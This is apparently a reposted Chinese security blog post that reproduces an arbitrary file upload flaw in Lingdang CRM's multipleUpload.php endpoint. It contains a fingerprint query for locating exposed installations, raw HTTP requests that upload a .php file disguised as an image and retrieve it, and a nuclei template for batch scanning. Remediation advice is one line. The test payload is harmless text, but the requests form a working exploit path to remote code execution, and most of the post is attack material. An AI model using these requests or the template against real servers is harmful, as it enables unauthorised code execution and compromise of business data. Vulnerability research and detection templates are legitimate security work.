免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
灵当CRM系统multipleUpload.php任意文件上传漏洞
02
—
漏洞影响
灵当CRM,版本信息不详
03
—
漏洞描述
灵当CRM是上海灵当信息科技有限公司开发的一款CRM软件,适用于以销售和服务业务为主的中小型企业。产品功能集销售管理、机会管理、渠道管理、售后服务管理、热线管理、合同管理、收付款管理、库存管理、人事管理、绩效与奖金管理、报表中心、呼叫中心管理于一体,帮助中小型企业实现销售、服务、财务一体化管理。灵当CRM系统接口multipleUpload.php文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全,请及时修复。
04
—
body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
05
—
漏洞复现
1,上传文件
POST /crm/modules/Home/multipleUpload.php?myatt_id=1&myatt_moduel=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Length: 207
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqpvtioxyquthilrc
Accept-Encoding: gzip
------WebKitFormBoundaryqpvtioxyquthilrc
Content-Disposition: form-data; name="file"; filename="kapke.php"
Content-Type: image/png
123456
------WebKitFormBoundaryqpvtioxyquthilrc--
响应内容如下
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Date: Fri, 27 Sep 2024 02:16:50 GMT
Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb mod_fcgid/2.3.9
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.33
{"name":"kapke.php","path":"storage/2024/September/week4/","size":20,"record":"46"}
2,查看回显文件
部分回显路径需要从第一步的响应数据包中获取,然后拼接前缀/crm/和文件名
GET /crm/storage/2024/September/week4/kapke.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
响应数据包
HTTP/1.1 200 OK
Connection: close
Content-Length: 40
Content-Encoding: gzip
Content-Type: text/html
Date: Fri, 27 Sep 2024 02:16:50 GMT
Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb mod_fcgid/2.3.9
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.33
123456
漏洞复现完成
06
—
nuclei poc
poc文件内容如下
id: lindang-crm-multipleUpload-fileupload
info:
name: 灵当CRM系统接口multipleUpload.php文件上传漏洞
author: fgz
severity: critical
description: 灵当CRM是上海灵当信息科技有限公司开发的一款CRM软件,适用于以销售和服务业务为主的中小型企业。产品功能集销售管理、机会管理、渠道管理、售后服务管理、热线管理、合同管理、收付款管理、库存管理、人事管理、绩效与奖金管理、报表中心、呼叫中心管理于一体,帮助中小型企业实现销售、服务、财务一体化管理。灵当CRM系统接口multipleUpload.php文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。
metadata:
1 :
body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js") :
verified: true
variables:
file_name: "{{to_lower(rand_text_alpha(8))}}"
file_content: "{{to_lower(rand_text_alpha(20))}}"
rboundary: "{{to_lower(rand_text_alpha(16))}}"
requests:
raw:
|+
POST /crm/modules/Home/multipleUpload.php?myatt_id=1&myatt_moduel=1 HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 :
multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}} :
------WebKitFormBoundary{{rboundary}}
form-data; name="file"; filename="{{file_name}}.php" :
image/png :
{{file_content}}
------WebKitFormBoundary{{rboundary}}--
|
GET /crm/{{path}}{{file_name}}.php HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 :
gzip :
extractors:
type: json
part: body
name: path
json:
'.path'
internal: true
matchers:
type: dsl
dsl:
"status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"
07
—
修复建议
关闭外部供给面,联系厂商打补丁。
原文始发于微信公众号(AI与网安):灵当CRM系统multipleUpload.php任意文件上传漏洞复现 批量poc
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论